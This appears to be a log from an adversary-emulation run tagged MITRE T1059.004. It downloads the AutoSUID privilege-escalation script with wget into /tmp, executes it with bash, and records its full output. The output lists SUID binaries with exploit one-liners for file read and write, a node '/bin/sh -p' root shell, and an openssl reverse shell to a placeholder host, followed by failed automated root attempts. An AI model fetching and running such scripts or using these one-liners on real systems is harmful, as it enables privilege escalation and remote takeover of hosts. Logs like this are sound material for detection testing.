[+] Tactic ID   : T1059.004-1
[+] Technique   : Command and Scripting Interpreter - Unix Shell
[+] Command     :
wget -q https://raw.githubusercontent.com/IvanGlinkin/AutoSUID/main/AutoSUID.sh -O /tmp/AutoSUID.sh 
bash /tmp/AutoSUID.sh
[+] Success
----- OUTPUT START -----

[00;33m╔═══════════════════════════════════════════════════════════════════════════╗[00m
[00;33m║									    ║[00m
[00;33m║[00m[01;32m				  AutoSUID				    [00m[00;33m║[00m
[00;33m║									    ║[00m
[00;33m╚═══════════════════════════════════════════════════════════════════════════╝[00m

[00;33m[ ! ] https://www.linkedin.com/in/IvanGlinkin/ | @glinkinivan[00m

[00;33m[ ! ][00m Running the command to find SUID files
[01;36m[ * * ][00m[01;32m find / -xdev -user root \( -perm -4000 -o -perm -2000 -o -perm -6000 \) 2>/dev/null[00m
[01;32m[ + ][00m The command has successfuly performed. We have found [01;32m614[00m file(s)
[00;33m[ ! ][00m Let's compare the found SUID files with predefined base ([01;32m175[00m apps)
[01;32m[ + ][00m We have found at least [01;32m9[00m potential SUID exploitable file(s):

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/lib/node_modules/npm/node_modules/@npmcli/fs/lib/cp
[01;36m[ Explanation ][00m [01;32mWrite into the restricted file: echo DATA | ./cp /dev/stdin FILE_TO_WRITE[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/lib/node_modules/npm/node_modules/diff
[01;36m[ Explanation ][00m [01;32mRead the restricted file: ./diff --line-format=%L /dev/null FILE_NAME[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/lib/node_modules/npm/node_modules/diff/lib/diff
[01;36m[ Explanation ][00m [01;32mRead the restricted file: ./diff --line-format=%L /dev/null FILE_NAME[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node
[01;36m[ Explanation ][00m [01;32mPrivilege escalation: ./node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/share/doc/node
[01;36m[ Explanation ][00m [01;32mPrivilege escalation: ./node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node/openssl
[01;36m[ Explanation ][00m [01;32m
	Get reverse shell: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect REMOTE_HOST:REMOTE_PORT > /tmp/s; rm /tmp/s
	Write into file: echo DATA | /.openssl enc -out FILE_NAME[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node/openssl/archs/linux-x86_64/no-asm/include/openssl
[01;36m[ Explanation ][00m [01;32m
	Get reverse shell: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect REMOTE_HOST:REMOTE_PORT > /tmp/s; rm /tmp/s
	Write into file: echo DATA | /.openssl enc -out FILE_NAME[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node/openssl/archs/linux-x86_64/asm/include/openssl
[01;36m[ Explanation ][00m [01;32m
	Get reverse shell: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect REMOTE_HOST:REMOTE_PORT > /tmp/s; rm /tmp/s
	Write into file: echo DATA | /.openssl enc -out FILE_NAME[00m

[01;36m[ * * ][00m /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node/openssl/archs/linux-x86_64/asm_avx2/include/openssl
[01;36m[ Explanation ][00m [01;32m
	Get reverse shell: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | ./openssl s_client -quiet -connect REMOTE_HOST:REMOTE_PORT > /tmp/s; rm /tmp/s
	Write into file: echo DATA | /.openssl enc -out FILE_NAME[00m

[01;32m[ + ][00m Exploitation...
[01;36m[ * * ][00m We have found[01;31m node SUID[00m file. Trying to get root
[01;36m[ * * ][00m Executing [01;31m/var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'[00m
/tmp/AutoSUID.sh: line 343: /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/include/node: Is a directory
[01;36m[ * * ][00m We have found[01;31m node SUID[00m file. Trying to get root
[01;36m[ * * ][00m Executing [01;31m/var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/share/doc/node -e 'child_process.spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]})'[00m
/tmp/AutoSUID.sh: line 343: /var/lib/docker/overlay2/5ae3d8a5913d7cc957a715a2eb0904e8efff94e0eca84e7ee5d6e4ebaa113920/diff/usr/local/share/doc/node: Is a directory
----- OUTPUT END -----
